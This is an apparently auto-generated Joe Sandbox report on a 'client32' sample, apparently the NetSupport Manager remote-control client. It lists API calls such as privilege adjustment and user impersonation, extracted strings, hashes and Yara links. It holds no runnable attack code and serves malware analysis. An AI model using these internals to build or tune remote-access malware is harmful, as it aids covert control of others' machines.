Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0

Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
CloseHandle.KERNEL32(?), ref: 1109D915

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60

Function 1102EBD0 Relevance: 252.2, APIs: 32, Strings: 111, Instructions: 1967windowthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetSystemMetrics.USER32(00002000,00000054,?,00000020,00000056,?,00000020), ref: 1102ED54
FindWindowA.USER32 ref: 1102EF15

Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(``N,?,11031700,00000001,00000000), ref: 11110E98
Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(``N,?,11031700), ref: 11110EAC
Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2

GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F

Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000), ref: 11094F59

SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
CloseHandle.KERNEL32(00000000), ref: 1102EFF0
FindWindowA.USER32 ref: 1102EFFD
GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
LoadIconA.USER32(11000000,000004C1,?,?,?,View,Client,Bridge), ref: 1102F521
LoadIconA.USER32(11000000,000004C2,?,?,?,View,Client,Bridge), ref: 1102F531
DestroyCursor.USER32(00000000,?,?,?,View,Client,Bridge), ref: 1102F557
DestroyCursor.USER32(00000000,?,?,?,View,Client,Bridge), ref: 1102F568

Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3

GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
DispatchMessageA.USER32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 11030136
PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
CloseHandle.KERNEL32(00000000), ref: 110303D4
GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
SetWindowPos.USER32(0001033C,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 11030449
CloseHandle.KERNEL32(00000000), ref: 110304CA

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

wsprintfA.USER32 ref: 11030645

Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,B24479DC,?,?,00000000), ref: 1112909A
Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE

Strings

istaService, xrefs: 1102EC6B
cl32main, xrefs: 1102EC03
Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 110309E6
Intel(r), xrefs: 1102F30C
IsILS returned %d, isvistaservice %d, xrefs: 1102F23E
LSPloaded=%d, WFPloaded=%d, xrefs: 1102F66E
DisableTSAdmin, xrefs: 1102F702
Windows 8, xrefs: 1102FE68
Windows XP Ding.wav, xrefs: 1102FA89
Bridge, xrefs: 1102F038
*StartupDelay, xrefs: 110300CC
NSA.LIC, xrefs: 1102F086
*BeepSound, xrefs: 1102FA4D
*ScreenScrape, xrefs: 11030177, 110301C0, 110303E0
Windows 2003, xrefs: 1102FCB0
Windows 2003 x64, xrefs: 1102FD18
_debug, xrefs: 110300AF
NSSWControl32, xrefs: 110307C1
istaUI, xrefs: 1102EC86
*ListenPort, xrefs: 1103073E
NSM.LIC, xrefs: 1102F078, 1102F11A
RestartAfterError, xrefs: 1102F6B4
Windows Millennium, xrefs: 1102FBCB
AssertTimeout, xrefs: 1102F5E7
NSMWClass, xrefs: 1102ED16, 1102EEF7, 1102EFF8, 1103062F
Windows XP x64, xrefs: 1102FCDF
Audio, xrefs: 1102F758, 1102FB27
Windows 10 x64, xrefs: 1102FF9D
DisableReplayMenu, xrefs: 1102F8A7, 1102F945
closed ok, xrefs: 1102EFE2
UseNTSecurity, xrefs: 1103054E
Intel error "%s", xrefs: 1102F322
Windows Ding.wav, xrefs: 1102FA82
Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s), xrefs: 11030A84
hClientRunning = %x, pid=%d (x%x), xrefs: 1102F025
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102F0E8
NSMWControl32, xrefs: 11030792
AlwaysOnTop, xrefs: 11030423
Windows 2012 R2, xrefs: 1102FF3E
ShowKBEnable, xrefs: 1102F85D
Info. Trying to close client, xrefs: 1102EFB8
CabinetWClass, xrefs: 110308F7
Windows 2008 x64, xrefs: 1102FDE2
NoFTWhenLoggedOff, xrefs: 1102F9BD
Error. Wrong hardware. Terminating, xrefs: 1102F26D, 1102F430
NSTWControl32, xrefs: 110307EA
Global\NSMWClassAdmin, xrefs: 1103063A
*BeepUsingSpeaker, xrefs: 1102FA1A
DisableAudio, xrefs: 1102F71A, 1102F73B, 1102F7A9, 1102F907, 1102F9A5
ScreenScrape, xrefs: 1102F7D9, 1102F803, 1102F82D
V12.00.20, xrefs: 1103002D
gClient.hNotifyEvent, xrefs: 1102ED9F
Client, xrefs: 1102F044, 1102F695, 1102F71F, 1102F740, 1102F7AE, 1102F7C6, 1102F7DE, 1102F808, 1102F832, 1102F862, 1102F894, 1102F8AC, 1102F8C4, 1102F8DC, 1102F8F4, 1102F90C, 1102F932, 1102F94A, 1102F962, 1102F97A, 1102F992, 1102F9AA, 1102F9C2, 1102F9DA, 1102FAEB, 110300D1, 1103017C, 110301C5, 1103038E, 110303E5, 11030401, 11030428, 11030538, 11030553, 11030574, 11030671
Windows 98, xrefs: 1102FB9B
EnableSmartcardLogon, xrefs: 11030533
Ready, xrefs: 11030801
Windows XP, xrefs: 1102FC89
Windows 10, xrefs: 1102FF6D
Windows 95, xrefs: 1102FB6A
View, xrefs: 1102F050, 1102F5A5, 1102F5BE, 1102F5D9
UseIPC, xrefs: 1103066C
Unsupported Platform, xrefs: 1102F445
Windows CE, xrefs: 1102FFFF
Windows Vista, xrefs: 1102FD4F
Windows 2000, xrefs: 1102FC5B
Windows 8.1 x64, xrefs: 1102FF12
_debug, xrefs: 1102F4C6, 1102F60A, 110306A4
Windows 8 x64, xrefs: 1102FE90
506013, xrefs: 1103022D, 11030280, 110302BB, 11030398
Error. Could not load transports - perhaps another client is running, xrefs: 110302F7
Windows 8.1, xrefs: 1102FEEF
NSMWClassVista, xrefs: 1102ED05
*PriorityClass, xrefs: 110303FC
Windows 7 x64, xrefs: 1102FE3A
Default, xrefs: 1103078B, 110307BA, 110307E3
TCPIP, xrefs: 11030743
Windows 2012, xrefs: 1102FEC1
DisableRunplugin, xrefs: 1102F7C1
DisableHelp, xrefs: 1102F9D5
DisableAudioFilter, xrefs: 1102F753, 1102FB22
DisableJournal, xrefs: 1102F8D7, 1102F975
Windows 2008, xrefs: 1102FDB6
OS2, xrefs: 1102FC0D
DisableRequestHelp, xrefs: 1102F8BF, 1102F95D
Windows NT, xrefs: 1102FC2E
Windows 2016, xrefs: 1102FFD4
\Explorer.exe, xrefs: 1103099D
Info. Client already running, pid=%d (x%x), xrefs: 1102EF56
UseLegacyPrintCapture, xrefs: 1102FAE6
TraceIPC, xrefs: 1103069F
V12.10.20, xrefs: 11030034, 11030068
client32, xrefs: 1102F15E, 1102F367, 1102F46E
IKS.LIC, xrefs: 1102F096, 1102F09D, 1102F0C0
Windows 7, xrefs: 1102FE19
MiniDumpType, xrefs: 1102F605
Session shutting down, exiting..., xrefs: 1102ED5E
CLIENT32.CPP, xrefs: 1102ED9A, 1102F380
JPK, xrefs: 1102F2D5, 1102F39B
NeedsReinstall, xrefs: 1102F690
Info. Client running as user=%s, type=%d, xrefs: 1102EFA6
DisableJoinClass, xrefs: 1102F88F, 1102F92D
pcicl32, xrefs: 1102EEE4
DisableJournalMenu, xrefs: 1102F8EF, 1102F98D
EnableSmartcardAuth, xrefs: 1103056F
IsJPIK returned %d, isvistaservice %d, xrefs: 1102F3FD
General, xrefs: 1102F5EC, 1102F6B9, 1102FA1F, 1102FA52
EnableGradientCaptions, xrefs: 1102F5A0, 1102F5B9, 1102F5D4
TracePriv, xrefs: 110300AA
Windows Vista x64, xrefs: 1102FD7D
win8ui, xrefs: 1102F4C1
DisableConsoleClient, xrefs: 1102F6EA, 1102F77F

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$506013$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
API String ID: 372548862-1813273994
Opcode ID: d704798d304668d6c9d70897418e9064f11a88c0fb45a053e68e8965863a9617
Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
Opcode Fuzzy Hash: d704798d304668d6c9d70897418e9064f11a88c0fb45a053e68e8965863a9617
Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102E844, 1102E8C3
Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102E5C4
client32 dbi %hs, xrefs: 1102E993
TSMode, xrefs: 1102E4B0
ListenPort, xrefs: 1102E4D0
Client, xrefs: 1102E4B5, 1102E4ED, 1102E604
18/11/16 11:28:14 V12.10F20, xrefs: 1102E98E
$session$, xrefs: 1102E886
screenscrape, xrefs: 1102E4E8
client32.ini, xrefs: 1102E325
NSMWClass, xrefs: 1102E2B4
Error x%x reading %s, sesh=%d, xrefs: 1102E381
MacAddress, xrefs: 1102E5FF
client32, xrefs: 1102E3F5
WTSQuerySessionInformationA, xrefs: 1102E56E
, xrefs: 1102E685
Wtsapi32.dll, xrefs: 1102E4FC
%session%, xrefs: 1102E89A
Warning: Unexpanded clientname=<%s>, xrefs: 1102E7C3
WTSFreeMemory, xrefs: 1102E631
506013, xrefs: 1102E715, 1102E8DB, 1102E8FF, 1102E90C, 1102E93C, 1102E9B1
IsA(), xrefs: 1102E849, 1102E8C8
%s.%02d, xrefs: 1102E820
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E9E0
TCPIP, xrefs: 1102E4D5
%02d, xrefs: 1102E808
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E9BA
%sessionname%, xrefs: 1102E859, 1102E872
ts macaddr=%s, xrefs: 1102E5EC
ClientName, xrefs: 1102E6B5
NSM.LIC, xrefs: 1102E0F2
DisableConsoleClient, xrefs: 1102E437

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memsetwsprintf
String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$506013$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
API String ID: 3802068140-3850021854
Opcode ID: 563c3c4442be5b629e94707c3790478f407da48259bf7247bb068fa10df72bc9
Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
Opcode Fuzzy Hash: 563c3c4442be5b629e94707c3790478f407da48259bf7247bb068fa10df72bc9
Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,756F110C), ref: 11144173
LoadLibraryA.KERNEL32(?), ref: 111441BC
LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
GetModuleHandleA.KERNEL32(?), ref: 111441EA
GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Strings

SymGetModuleInfo, xrefs: 11144282
dbghelp.dll, xrefs: 11144198
SymLoadModule, xrefs: 11144256
SymGetLineFromName, xrefs: 11144217
SymGetSymFromAddr, xrefs: 1114428D
SymFunctionTableAccess, xrefs: 11144298
SymGetOptions, xrefs: 1114426C
IMAGEHLP.DLL, xrefs: 111441DE, 111441E3, 111441E9
SymMatchFileName, xrefs: 11144235
SymInitialize, xrefs: 11144261
SymSetOptions, xrefs: 11144277
StackWalk, xrefs: 11144243
MiniDumpWriteDump, xrefs: 111442A3
SymGetLineFromAddr, xrefs: 111441F8
SymCleanup, xrefs: 1114424B
DBGHELP.DLL, xrefs: 111441CF, 111441D4
SymGetLinePrev, xrefs: 1114422A
SymGetLineNext, xrefs: 1114421F

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
API String ID: 3874234733-2061581830
Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 1102E501

Strings

Trying to get mac addr for %u.%u.%u.%u, xrefs: 1102E5C4
client32 dbi %hs, xrefs: 1102E993
WTSFreeMemory, xrefs: 1102E631
TSMode, xrefs: 1102E4B0
ListenPort, xrefs: 1102E4D0
506013, xrefs: 1102E715, 1102E93C, 1102E9B1
Client, xrefs: 1102E4B5, 1102E4ED, 1102E604
18/11/16 11:28:14 V12.10F20, xrefs: 1102E98E
screenscrape, xrefs: 1102E4E8
multipoint=%d, softxpand=%d, pid=%d, xrefs: 1102E9E0
client32.ini, xrefs: 1102E325
Error x%x reading %s, sesh=%d, xrefs: 1102E381
TCPIP, xrefs: 1102E4D5
MacAddress, xrefs: 1102E5FF
WTSQuerySessionInformationA, xrefs: 1102E56E
computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d, xrefs: 1102E9BA
, xrefs: 1102E685
ts macaddr=%s, xrefs: 1102E5EC
ClientName, xrefs: 1102E6B5
Wtsapi32.dll, xrefs: 1102E4FC
DisableConsoleClient, xrefs: 1102E437

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
